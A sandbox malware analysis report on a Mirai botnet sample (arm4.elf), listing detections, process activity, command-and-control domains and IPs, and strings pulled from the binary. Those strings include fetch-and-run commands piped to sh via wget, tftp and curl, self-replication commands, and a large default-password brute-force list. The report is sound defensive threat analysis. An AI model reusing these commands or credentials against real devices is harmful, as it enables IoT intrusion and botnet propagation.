Edit tour

Linux Analysis Report
arm4.elf

Overview

General Information

Sample name:	arm4.elf
Analysis ID:	1611398
MD5:	2e611d06aeb1cc3dac822323b6d17a6c
SHA1:	93a697b34c5c9d6d60f7bc05b9b0553a618e2ad1
SHA256:	879f8c06476799fb014da7f4197f72f977dc2e2025d6fd01126c1d1e349f371e
Tags:	elfuser-abuse_ch
Infos:

Detection

Mirai

Score:	76
Range:	0 - 100

Signatures

Antivirus / Scanner detection for submitted sample

Yara detected Mirai

Connects to many ports of the same IP (likely port scanning)

Sample tries to kill multiple processes (SIGKILL)

Sends malformed DNS queries

Detected TCP or UDP traffic on non-standard ports

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample contains strings indicative of password brute-forcing capabilities

Sample has stripped symbol table

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1611398
Start date and time:	2025-02-10 20:57:23 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	arm4.elf
Detection:	MAL
Classification:	mal76.spre.troj.linELF@0/0@4/0

Warnings

VT rate limit hit for: cuttiecats.ru. [malformed]

Runtime Messages

Command:	/tmp/arm4.elf
PID:	6233
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	The Peoples Bank of China.
Standard Error:

Process Tree

system is lnxubuntu20

arm4.elf (PID: 6233, Parent: 6157, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm4.elf

arm4.elf New Fork (PID: 6235, Parent: 6233)

arm4.elf New Fork (PID: 6237, Parent: 6235)

arm4.elf New Fork (PID: 6241, Parent: 6235)

arm4.elf New Fork (PID: 6242, Parent: 6235)

gdm3 New Fork (PID: 6267, Parent: 1320)

Default (PID: 6267, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

xfce4-session New Fork (PID: 6268, Parent: 1900)

gdm3 New Fork (PID: 6272, Parent: 1320)

Default (PID: 6272, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

xfce4-session New Fork (PID: 6273, Parent: 1900)

xfce4-session New Fork (PID: 6274, Parent: 1900)

xfce4-session New Fork (PID: 6275, Parent: 1900)

xfdesktop (PID: 6275, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542

xfce4-session New Fork (PID: 6277, Parent: 1900)

xfce4-panel (PID: 6277, Parent: 1900, MD5: a15b657c7d54ac1385f1f15004ea6784) Arguments: xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec

xfce4-session New Fork (PID: 6279, Parent: 1900)

xfce4-session New Fork (PID: 6280, Parent: 1900)

xfce4-session New Fork (PID: 6281, Parent: 1900)

xfce4-session New Fork (PID: 6282, Parent: 1900)

xfwm4 (PID: 6282, Parent: 1900, MD5: 59defa3c00cc30d85ed77b738d55e9da) Arguments: xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c

xfce4-session New Fork (PID: 6284, Parent: 1900)

xfdesktop (PID: 6284, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542

xfce4-session New Fork (PID: 6286, Parent: 1900)

xfce4-panel (PID: 6286, Parent: 1900, MD5: a15b657c7d54ac1385f1f15004ea6784) Arguments: xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
arm4.elf	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
arm4.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author
6233.1.00007ff580017000.00007ff58002f000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6233.1.00007ff580017000.00007ff58002f000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6241.1.00007ff580017000.00007ff58002f000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6241.1.00007ff580017000.00007ff58002f000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6237.1.00007ff580017000.00007ff58002f000.r-x.sdmp	JoeSecurity_Mirai_9	Yara detected Mirai	Joe Security
6237.1.00007ff580017000.00007ff58002f000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Click to see the 1 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: arm4.elf

Avira: detected

Source: arm4.elf

String: /bin/busyboxenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrepThe People'sincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 185.93.89.106 ports 38241,1,2,3,4,8

Sends malformed DNS queries

Source: global traffic	DNS traffic detected: malformed DNS query: cuttiecats.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: kittlez.ru. [malformed]
Source: global traffic	DNS traffic detected: malformed DNS query: polizei.su. [malformed]

Source: global traffic

TCP traffic: 192.168.2.23:39708 -> 185.93.89.106:38241

Source: /tmp/arm4.elf (PID: 6233)

Socket: 127.0.0.1:39148

Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 16.77.138.247
Source: unknown	TCP traffic detected without corresponding DNS query: 16.77.138.247
Source: unknown	TCP traffic detected without corresponding DNS query: 88.12.42.142
Source: unknown	TCP traffic detected without corresponding DNS query: 13.84.114.117
Source: unknown	TCP traffic detected without corresponding DNS query: 88.12.42.142
Source: unknown	TCP traffic detected without corresponding DNS query: 150.171.47.88
Source: unknown	TCP traffic detected without corresponding DNS query: 13.84.114.117
Source: unknown	TCP traffic detected without corresponding DNS query: 175.114.233.75
Source: unknown	TCP traffic detected without corresponding DNS query: 150.171.47.88
Source: unknown	TCP traffic detected without corresponding DNS query: 73.139.184.123
Source: unknown	TCP traffic detected without corresponding DNS query: 175.114.233.75
Source: unknown	TCP traffic detected without corresponding DNS query: 73.139.184.123
Source: unknown	TCP traffic detected without corresponding DNS query: 182.109.211.92
Source: unknown	TCP traffic detected without corresponding DNS query: 163.69.161.84
Source: unknown	TCP traffic detected without corresponding DNS query: 182.109.211.92
Source: unknown	TCP traffic detected without corresponding DNS query: 201.73.138.150
Source: unknown	TCP traffic detected without corresponding DNS query: 163.69.161.84
Source: unknown	TCP traffic detected without corresponding DNS query: 201.73.138.150
Source: unknown	TCP traffic detected without corresponding DNS query: 41.87.27.147
Source: unknown	TCP traffic detected without corresponding DNS query: 82.241.224.181
Source: unknown	TCP traffic detected without corresponding DNS query: 41.87.27.147
Source: unknown	TCP traffic detected without corresponding DNS query: 34.165.31.3
Source: unknown	TCP traffic detected without corresponding DNS query: 92.103.255.193
Source: unknown	TCP traffic detected without corresponding DNS query: 82.241.224.181
Source: unknown	TCP traffic detected without corresponding DNS query: 34.165.31.3
Source: unknown	TCP traffic detected without corresponding DNS query: 28.43.37.155
Source: unknown	TCP traffic detected without corresponding DNS query: 92.103.255.193
Source: unknown	TCP traffic detected without corresponding DNS query: 45.215.74.98
Source: unknown	TCP traffic detected without corresponding DNS query: 28.43.37.155
Source: unknown	TCP traffic detected without corresponding DNS query: 80.77.205.68
Source: unknown	TCP traffic detected without corresponding DNS query: 45.215.74.98
Source: unknown	TCP traffic detected without corresponding DNS query: 21.246.80.80
Source: unknown	TCP traffic detected without corresponding DNS query: 80.77.205.68
Source: unknown	TCP traffic detected without corresponding DNS query: 79.163.40.134
Source: unknown	TCP traffic detected without corresponding DNS query: 21.246.80.80
Source: unknown	TCP traffic detected without corresponding DNS query: 102.30.246.215
Source: unknown	TCP traffic detected without corresponding DNS query: 118.163.76.89
Source: unknown	TCP traffic detected without corresponding DNS query: 79.163.40.134
Source: unknown	TCP traffic detected without corresponding DNS query: 102.30.246.215
Source: unknown	TCP traffic detected without corresponding DNS query: 57.120.199.241
Source: unknown	TCP traffic detected without corresponding DNS query: 118.163.76.89
Source: unknown	TCP traffic detected without corresponding DNS query: 57.120.199.241
Source: unknown	TCP traffic detected without corresponding DNS query: 37.167.173.36
Source: unknown	TCP traffic detected without corresponding DNS query: 37.167.173.36
Source: unknown	TCP traffic detected without corresponding DNS query: 37.22.199.62
Source: unknown	TCP traffic detected without corresponding DNS query: 91.57.48.123
Source: unknown	TCP traffic detected without corresponding DNS query: 37.22.199.62
Source: unknown	TCP traffic detected without corresponding DNS query: 23.185.156.128
Source: unknown	TCP traffic detected without corresponding DNS query: 91.57.48.123
Source: unknown	TCP traffic detected without corresponding DNS query: 134.64.22.190

Source: global traffic	DNS traffic detected: DNS query: cat-are-here.ru
Source: global traffic	DNS traffic detected: DNS query: cuttiecats.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: kittlez.ru. [malformed]
Source: global traffic	DNS traffic detected: DNS query: polizei.su. [malformed]

Source: arm4.elf	String found in binary or memory: http:///curl.sh
Source: arm4.elf	String found in binary or memory: http:///wget.sh

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Sample tries to kill multiple processes (SIGKILL)

Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 721, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 904, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 1475, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 1576, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 1601, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 1877, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 1900, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 1983, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2028, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2048, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2050, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2062, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2063, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2069, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2074, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2096, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2097, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2102, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2123, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2126, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6218, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6237, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6241, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6268, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6273, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6274, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6275, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6276, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6277, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6278, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6279, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6280, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6281, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6282, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6283, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6284, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6285, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6286, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6287, result: successful	Jump to behavior

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: usage: busybox
Source: Initial sample	String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample	String containing 'busybox' found: /wget.sh -O- \| sh;/bin/busybox tftp -g
Source: Initial sample	String containing 'busybox' found: -r tftp.sh -l- \| sh;/bin/busybox ftpget
Source: Initial sample	String containing 'busybox' found: /bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrep
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample	String containing 'busybox' found: /bin/busyboxenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd .ksh .k/bin/busybox wget http:///wget.sh -O- \| sh;/bin/busybox tftp -g -r tftp.sh -l- \| sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- \| sh/bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrepThe People'sincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
Source: Initial sample	String containing 'busybox' found: /bin/busybox echo -ne >> > .d

Source: Initial sample	String containing potential weak password found: 54321
Source: Initial sample	String containing potential weak password found: 654321
Source: Initial sample	String containing potential weak password found: default
Source: Initial sample	String containing potential weak password found: admin1234
Source: Initial sample	String containing potential weak password found: service
Source: Initial sample	String containing potential weak password found: password
Source: Initial sample	String containing potential weak password found: guest
Source: Initial sample	String containing potential weak password found: support
Source: Initial sample	String containing potential weak password found: administrator
Source: Initial sample	String containing potential weak password found: supervisor

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 721, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 904, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 1475, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 1576, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 1601, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 1877, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 1900, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 1983, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2028, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2048, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2050, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2062, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2063, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2069, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2074, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2096, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2097, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2102, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2123, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 2126, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6218, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6237, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6241, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6268, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6273, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6274, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6275, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6276, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6277, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6278, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6279, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6280, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6281, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6282, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6283, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6284, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6285, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6286, result: successful	Jump to behavior
Source: /tmp/arm4.elf (PID: 6242)	SIGKILL sent: pid: 6287, result: successful	Jump to behavior

Source: classification engine

Classification label: mal76.spre.troj.linELF@0/0@4/0

Source: /tmp/arm4.elf (PID: 6233)

Queries kernel information via 'uname':

Jump to behavior

Source: arm4.elf, 6233.1.00007ffc675a7000.00007ffc675c8000.rw-.sdmp, arm4.elf, 6237.1.00007ffc675a7000.00007ffc675c8000.rw-.sdmp, arm4.elf, 6241.1.00007ffc675a7000.00007ffc675c8000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm4.elf
Source: arm4.elf	Binary or memory string: vmware
Source: arm4.elf, 6233.1.0000560060b33000.0000560060c61000.rw-.sdmp, arm4.elf, 6237.1.0000560060b33000.0000560060c61000.rw-.sdmp, arm4.elf, 6241.1.0000560060b33000.0000560060c61000.rw-.sdmp	Binary or memory string: `V!/etc/qemu-binfmt/arm
Source: arm4.elf	Binary or memory string: vmware123
Source: arm4.elf	Binary or memory string: / nE7jA%5mmicrobusinessPASSWORDmeinsmcms500adslnadamgiraff666666zoomadslsuperadminIs@dminikwbalpineasantepuconexantaquariotinitsunamivertex25ektks123inflectionip20anicuscADMINpermitpldtadminonexantdvr2580222Win1doW$true5432112341234JVC3500/24sitecom46ironport88888888uClinuxvolition2800tslinuxsecurityatlantis888888nCwMnJVGagbaby00000000openelec1111111kont2004rpitc123123696969362729atc456hp.comcycl3R0cks!letacla000000nosoup4u11111111Gin51mvf3mg3500merlin99999999admin1anni201322222mlusrlogin3333333adminpldtbbsd-clientchangeme2support123aerohiveadmin00vmware123utstartl789l3tm31nseiko2005tivonpw,ba23422222222admintrupt1789admdarkcusadminhighspeedascendMenarasysAdmin33333oracleanicust3333wbox123attackAscendAitbISP4eCiGadmin@mymifi2222222dPZb4GJTu9ROOMeins1988321piloucomcastsetupZmqVfoSIP333333michelangeloCOadmin123Zntslqblendervt100admin_1pfsensehellotest1my_DEMARCjvswitchezdvr7ujMko0root/ADMIN/adminlvjhadminlvjh1232010vstaxmhdpicruntop10qwertyQwestM0demqweasdzxguest123h2014071TANDBERGWprootarkeiachangemenowf00b@rarticawww9311supersurtiwkbadmintesthuigu309UsernetscreenpitaZz@23495859Root1password123fidel123annie2016asdfghdottietwe8ehomebatman123hackedwelcomeyellowD13hh[china123p@ssw0rdjordanhackmewagodasdec1patrickgforgeEminemspidermansparkypassword1shadowgatewaydiamondprincessflowerchelsearichardFootballpornsexycamarofalconwhorebigdogChongqingcuntmartin12121212bitchcheeseHustonsecretpassword123456789Metallicacowboy1999654321slipknotstarwarsCharlie1997daddyRootdragonhustonfuckmepussytrustno1cowboysfootballsmcadminsysadmvmwareprofensegamezlrkr0x123qwesuperuserIntraStackAsantecraftcrftpwfriendrootmeP@55w0rd!debugrainCisconsrootinformixmediatorqwe123db2fenc1ibmdb2forgotvideoinfobloxdb2inst1nagiosxiiclocktimelyenablediagdraytekdbadminsq!us3rglftpddiagdangerapcAlphanetworkswrgg15_di524adminHWapacheabcwebserverapache123arpwatchavinashaspbackupadminazzakhalelbackuppukcabasteriskbackupscmhealthbadservercactielliebackup1234cloudcbscbs123billsupermenbenutzerpasswortftp1234annie2013annie2015annie2012annie2014jvcepicrouter
Source: arm4.elf, 6233.1.0000560060b33000.0000560060c61000.rw-.sdmp, arm4.elf, 6237.1.0000560060b33000.0000560060c61000.rw-.sdmp, arm4.elf, 6241.1.0000560060b33000.0000560060c61000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: arm4.elf, 6233.1.00007ffc675a7000.00007ffc675c8000.rw-.sdmp, arm4.elf, 6237.1.00007ffc675a7000.00007ffc675c8000.rw-.sdmp, arm4.elf, 6241.1.00007ffc675a7000.00007ffc675c8000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: arm4.elf, type: SAMPLE
Source: Yara match	File source: 6233.1.00007ff580017000.00007ff58002f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6241.1.00007ff580017000.00007ff58002f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6237.1.00007ff580017000.00007ff58002f000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: arm4.elf, type: SAMPLE
Source: Yara match	File source: 6233.1.00007ff580017000.00007ff58002f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6241.1.00007ff580017000.00007ff58002f000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6237.1.00007ff580017000.00007ff58002f000.r-x.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	Path Interception	Direct Volume Access	1 Brute Force	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Service Stop
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
arm4.elf	100%	Avira	EXP/ELF.Mirai.W

Name	IP	Active	Malicious	Reputation
cat-are-here.ru	185.93.89.106	true	false	high
cuttiecats.ru. [malformed]	unknown	unknown	true	unknown
polizei.su. [malformed]	unknown	unknown	false	high
